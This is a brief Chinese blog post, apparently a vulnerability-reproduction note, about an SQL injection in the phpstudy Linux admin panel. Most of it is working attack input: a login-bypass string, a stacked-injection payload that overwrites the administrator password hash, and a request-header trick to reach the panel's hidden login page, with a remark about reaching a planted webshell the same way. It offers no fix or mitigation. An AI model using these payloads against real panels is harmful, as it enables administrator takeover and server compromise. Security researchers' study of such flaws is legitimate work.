phpstudy-linux面板(小皮面板)存在SQL注入漏洞



https://mp.weixin.qq.com/s/DCSHSF7hQdDtYTmmsPnFEQ
https://www.bilibili.com/video/BV1Yc411j7TP/

万能密码
admin' and 1=1 #
万能密码默认使得程序直接崩溃，无法直接利用

堆叠注入
admin';update admins set password='c464514e8891b00a0cf575afc4248f9f';--

利用难点
寻找后台地址
X-Requested-With: XMLHttpRequest
请求头带上上述参数即可访问面 板登录页面，无需知道路径，若写webshell，则访问webshell也同样需要带上这个请求头

更新: 2023-03-26 00:35:15
原文: https://www.yuque.com/yuqueyonghuwrqimt/vtxvff/yk7pv6shet6ao683

漏洞挖掘与复现 > web应用 > phpstudy

https://savior-only.github.io/p/3be46a22ba8a49dc85eb45246246beb2/

作者

savior

发布于

2024年12月25日

更新于

2024年12月25日

许可协议

XXL-JOB默认accessToken身份绕过导致RCE 上一篇

PHPUnit代码执行下一篇